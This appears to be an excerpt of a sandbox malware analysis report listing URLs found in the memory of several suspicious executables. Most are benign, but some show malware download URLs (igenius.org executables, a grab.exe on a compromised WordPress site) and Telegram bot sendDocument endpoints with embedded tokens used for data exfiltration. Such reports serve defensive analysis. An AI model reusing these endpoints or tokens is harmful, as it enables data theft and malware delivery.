Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003023000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003023000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14V
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000003103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000311E000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: 62AB.tmp.build.exe, 00000014.00000002.2394089953.000000000310B000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.igenius.org/Client.exe
Source: explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.igenius.org/Installer.exe
Source: explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.igenius.org/Server.exe
Source: explorer.exe, 00000002.00000003.1848397983.000000000AB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.igenius.org/aaa.exe
Source: explorer.exe, 00000002.00000003.1848397983.000000000AB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.igenius.org/build.exe
Source: explorer.exe, 00000002.00000003.1848397983.000000000AB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.igenius.org/update.exe
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000003.1848397983.000000000AB33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.1887290891.000000000AB33000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.westnilebirdingandsafari.com/wp-admin/css/colors/ocean/grab.exe
Source: accc.exe, 0000000B.00000002.3238247291.000000001D282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2825556691.000000000404E000.00000004.00000800.00020000.00000000.sdmp, tmpBA07.tmp.dat.39.dr, tmp837E.tmp.dat.9.dr, tmp82FD.tmp.dat.9.dr, tmp2237.tmp.dat.10.dr, tmp4DC0.tmp.dat.39.dr, tmp77C6.tmp.dat.6.dr, tmp4E32.tmp.dat.10.dr, tmp767A.tmp.dat.6.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.1790509509.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3176869488.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000002.00000000.1785022693.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000002.00000002.3176869488.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1790509509.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: 62AB.tmp.build.exe, 00000014.00000000.1945315404.0000000000A72000.00000002.00000001.01000000.00000018.sdmp, 62AB.tmp.build.exe, 00000014.00000002.2394089953.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, 62AB.tmp.build.exe.2.dr	String found in binary or memory: https://api.ip.sb/ip
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipif$
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003645000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipif8V
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003645000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipif8Z
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003110000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003645000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: explorer.exe, 00000002.00000000.1787337320.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3162050946.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.1787337320.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000002.00000002.3134385875.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1783876934.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1783065410.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000002.3162050946.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1787337320.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.1787337320.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1785022693.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3146116785.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
Source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.0000000003468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, 3CBD.tmp.Installer.exe, 00000005.00000002.1941590624.000000000349A000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.000000000252A000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.000000000298A000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 4336.tmp.Server.exe.2.dr	String found in binary or memory: https://api.telegram.org/bot
Source: explorer.exe, 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, svchost.exe, 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, jqnnpe.exe, 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, jqnnpe.exe.24.dr, 4BC4.tmp.Client.exe.2.dr	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id==&caption=====
Source: 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283
Source: 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.00000000029E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendDocument?chat_id=5795
Source: 476D.tmp.Server.exe, 00000009.00000002.2874806986.000000000298A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6082381502:AAEEe5dVvSMdEf-_fKUh7iRqcNun3Q5DzxM/sendMessage?chat_id=57954
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000003146000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7203427100:AAE4oxY4yahcr0ruK5AXnOIUYn1d9UmUZqs/sendDocument?chat_id=-420
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002583000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8
Source: 476D.tmp.Server.exe, 00000009.00000002.2874806986.00000000029E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/botTF
Source: 4336.tmp.Server.exe, 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, 476D.tmp.Server.exe.2.dr, 4336.tmp.Server.exe.2.dr	String found in binary or memory: https://api.telegram.org/file/bot
Source: 4336.tmp.Server.exe, 00000006.00000002.3152347475.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, 4336.tmp.Server.exe, 00000006.00000002.3152347475.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E92000.00000004.00000800.00020000.00000000.sdmp, 476D.tmp.Server.exe, 00000009.00000002.2874806986.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgD
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.00000000030DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgd
Source: 4BC4.tmp.Client.exe, 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.vimeworld.ru/user/name/
